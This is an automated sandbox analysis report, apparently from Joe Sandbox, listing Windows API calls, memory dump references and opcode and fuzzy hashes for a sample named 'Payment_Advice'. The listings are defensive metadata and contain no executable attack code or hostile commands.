                                                                                                    • API String ID: 897784432-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • DloadProtectSection.DELAYIMP ref: 0051E5E3
                                                                                                    Similarity
                                                                                                    • API ID: DloadProtectSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 2203082970-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetFileType.KERNELBASE(000000FF,005097BE), ref: 005098C8
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID:
                                                                                                    • API String ID: 3081899298-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051EAF9
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 4ecdeb4de36784aaf12df7fd7aae181055b4b5fef225ed0e460b8e7397099fbc
                                                                                                    • Instruction ID: 6e3e9deb698678a115b057248ef35bdb139d7c5a01019eadc7ea263a3f528341
                                                                                                    • Opcode Fuzzy Hash: 4ecdeb4de36784aaf12df7fd7aae181055b4b5fef225ed0e460b8e7397099fbc
                                                                                                    • Instruction Fuzzy Hash: 1BB012C629A0437C3204A2041D0FC7B0E4CF8C1FA0730C42EFC00D4081DC811C870431
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 91959be5000ddc508665b379a0595ab0ad89ad004055d68f9d65c883b0b5ad3f
                                                                                                    • Instruction ID: 1fd7e4c1077742809964f39fdd1740c285bf493bbf45ff8566bc905dc8529a3f
                                                                                                    • Opcode Fuzzy Hash: 91959be5000ddc508665b379a0595ab0ad89ad004055d68f9d65c883b0b5ad3f
                                                                                                    • Instruction Fuzzy Hash: 2CB012E125C011FC320491085D0BC770F4CF5C0B30330C82EFC14D2080D8405C8A0533
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 2a477607aa08043b6c7fba702584e909a2ece5f027a9560e45efa0ce33259840
                                                                                                    • Instruction ID: 4acc5d5e1d7db53e01a965bda49c0e46eac4b1730f969caa8da5ddd8e82a5c35
                                                                                                    • Opcode Fuzzy Hash: 2a477607aa08043b6c7fba702584e909a2ece5f027a9560e45efa0ce33259840
                                                                                                    • Instruction Fuzzy Hash: F1B012E125C011BC320451085E0BCB70F4CF5C0B30330C82EFD14D2080D8401C8F0533
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 5651896f9ffe947bfd2a10299060524116d511675e0b7207cdd5d3e74255e960
                                                                                                    • Instruction ID: ea569c846ba704205eb659e67d0307ecbd827007464c7faed8d1e0344c6aee85
                                                                                                    • Opcode Fuzzy Hash: 5651896f9ffe947bfd2a10299060524116d511675e0b7207cdd5d3e74255e960
                                                                                                    • Instruction Fuzzy Hash: E5B012F125C011FC320491081C0BC770F4CF6C0F20330892EFC14D2081D8445E8A0533
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 94d23d8662282435525989383b7baa24a6bf167c78f2130f2a7005a25aeaabfd
                                                                                                    • Instruction ID: 5095b703a1bb8c0b1a171f284fcd93457a1f76f51a61ad65b57324fa5271cbfb
                                                                                                    • Opcode Fuzzy Hash: 94d23d8662282435525989383b7baa24a6bf167c78f2130f2a7005a25aeaabfd
                                                                                                    • Instruction Fuzzy Hash: F5A011E22A80223C300822002C0BCBB0F0CE8C0B20330882EFC20A0080AC8028820833
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: fdcd8ac3be2ae8294ab411d6476ff3841c95abeb5bd800781bec711f4b009e56
                                                                                                    • Instruction ID: 260deee851b4d6e343054b1fe453c9ce86cb2e92089be700059c4ebdc8251605
                                                                                                    • Opcode Fuzzy Hash: fdcd8ac3be2ae8294ab411d6476ff3841c95abeb5bd800781bec711f4b009e56
                                                                                                    • Instruction Fuzzy Hash: 87A011E22AC022BC300822002C0BCBB0F0CE8C0B203308C2EFC22A0080A88028820833
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 64e452ab1a1c98a1d473d88da5d01ac4fad107965b8f3e0cc177e336e918e2ae
                                                                                                    • Instruction ID: 260deee851b4d6e343054b1fe453c9ce86cb2e92089be700059c4ebdc8251605
                                                                                                    • Opcode Fuzzy Hash: 64e452ab1a1c98a1d473d88da5d01ac4fad107965b8f3e0cc177e336e918e2ae
                                                                                                    • Instruction Fuzzy Hash: 87A011E22AC022BC300822002C0BCBB0F0CE8C0B203308C2EFC22A0080A88028820833
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 31a737a6d51ce8471b4ef6ccac37103ed15197c9f08e10e6cc1ba492a49bddfb
                                                                                                    • Instruction ID: 260deee851b4d6e343054b1fe453c9ce86cb2e92089be700059c4ebdc8251605
                                                                                                    • Opcode Fuzzy Hash: 31a737a6d51ce8471b4ef6ccac37103ed15197c9f08e10e6cc1ba492a49bddfb
                                                                                                    • Instruction Fuzzy Hash: 87A011E22AC022BC300822002C0BCBB0F0CE8C0B203308C2EFC22A0080A88028820833
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 6873e6c31a88d634a1515b9b1e2f65d837a4b2ee1be56e38575fffa262c632c8
                                                                                                    • Instruction ID: 260deee851b4d6e343054b1fe453c9ce86cb2e92089be700059c4ebdc8251605
                                                                                                    • Opcode Fuzzy Hash: 6873e6c31a88d634a1515b9b1e2f65d837a4b2ee1be56e38575fffa262c632c8
                                                                                                    • Instruction Fuzzy Hash: 87A011E22AC022BC300822002C0BCBB0F0CE8C0B203308C2EFC22A0080A88028820833
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 3cd46db6d8f79c7373af5b0258d8ff1b7f8eea29a59b7da0641bc8db4e4b6b73
                                                                                                    • Instruction ID: 260deee851b4d6e343054b1fe453c9ce86cb2e92089be700059c4ebdc8251605
                                                                                                    • Opcode Fuzzy Hash: 3cd46db6d8f79c7373af5b0258d8ff1b7f8eea29a59b7da0641bc8db4e4b6b73
                                                                                                    • Instruction Fuzzy Hash: 87A011E22AC022BC300822002C0BCBB0F0CE8C0B203308C2EFC22A0080A88028820833
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetEndOfFile.KERNELBASE(?,0050903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00509F0C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File
                                                                                                    • String ID:
                                                                                                    • API String ID: 749574446-0
                                                                                                    • Opcode ID: f8bf571d3023a0292f49a4467b3138c50cb86ef7b45a3818125e33c92980aaf8
                                                                                                    • Instruction ID: 16004a85731d96b908246ed468ff7ea234b09c3dffe07045bf57e3871fce025b
                                                                                                    • Opcode Fuzzy Hash: f8bf571d3023a0292f49a4467b3138c50cb86ef7b45a3818125e33c92980aaf8
                                                                                                    • Instruction Fuzzy Hash: D6A0113008800A8AEE002B30CA0800C3B20EB20BC030002A8A00ACA0A2CB2A880BAA00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0051AE72,C:\Users\user\Desktop,00000000,0054946A,00000006), ref: 0051AC08
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory
                                                                                                    • String ID:
                                                                                                    • API String ID: 1611563598-0
                                                                                                    • Opcode ID: ae9b26be83c7e9103d52a3076ac40d24b111367f10cf74cd204ad1571fcd508e
                                                                                                    • Instruction ID: b1ead3f50dc62a44af208e8c754f20da1531cca12418ce7a0e41f345ea7f03b6
                                                                                                    • Opcode Fuzzy Hash: ae9b26be83c7e9103d52a3076ac40d24b111367f10cf74cd204ad1571fcd508e
                                                                                                    • Instruction Fuzzy Hash: F0A011302002008B83000B328F0AA0EBAAAAFA2B20F00C028A00080230CB30C820FA00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 00501316: GetDlgItem.USER32(00000000,00003021), ref: 0050135A
                                                                                                      • Part of subcall function 00501316: SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0051C2B1
                                                                                                    • EndDialog.USER32(?,00000006), ref: 0051C2C4
                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0051C2E0
                                                                                                    • SetFocus.USER32(00000000), ref: 0051C2E7
                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0051C321
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0051C358
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0051C36E
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0051C38C
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0051C39C
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0051C3B8
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0051C3D4
                                                                                                    • _swprintf.LIBCMT ref: 0051C404
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0051C417
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0051C41E
                                                                                                    • _swprintf.LIBCMT ref: 0051C477
                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0051C48A
                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0051C4A7
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0051C4C7
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0051C4D7
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0051C4F1
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0051C509
                                                                                                    • _swprintf.LIBCMT ref: 0051C535
                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0051C548
                                                                                                    • _swprintf.LIBCMT ref: 0051C59C
                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0051C5AF
                                                                                                      • Part of subcall function 0051AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0051AF35
                                                                                                      • Part of subcall function 0051AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0053E72C,?,?), ref: 0051AF84
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                    • String ID: %s %s$%s %s %s$PQ$REPLACEFILEDLG
                                                                                                    • API String ID: 797121971-1312056977
                                                                                                    • Opcode ID: 17fd49fb86dc462ec62771c89bab1ff21bb3fda609eec7bace2adec74c7d5aba
                                                                                                    • Instruction ID: b0ed41e24b8eb3a7f105edeb79b92dbe0e04eda61e0f56e096610c8431df6a02
                                                                                                    • Opcode Fuzzy Hash: 17fd49fb86dc462ec62771c89bab1ff21bb3fda609eec7bace2adec74c7d5aba
                                                                                                    • Instruction Fuzzy Hash: CC91A7721483447BE3219BA4DC4DFFB7FACFB9A700F044819F685D6181D771A6489762
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00506FAA
                                                                                                    • _wcslen.LIBCMT ref: 00507013
                                                                                                    • _wcslen.LIBCMT ref: 00507084
                                                                                                      • Part of subcall function 00507A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00507AAB
                                                                                                      • Part of subcall function 00507A9C: GetLastError.KERNEL32 ref: 00507AF1
                                                                                                      • Part of subcall function 00507A9C: CloseHandle.KERNEL32(?), ref: 00507B00
                                                                                                      • Part of subcall function 0050A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0050977F,?,?,005095CF,?,?,?,?,?,00532641,000000FF), ref: 0050A1F1
                                                                                                      • Part of subcall function 0050A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0050977F,?,?,005095CF,?,?,?,?,?,00532641), ref: 0050A21F
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00507139
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00507155
                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00507298
                                                                                                      • Part of subcall function 00509DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,005073BC,?,?,?,00000000), ref: 00509DBC
                                                                                                      • Part of subcall function 00509DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00509E70
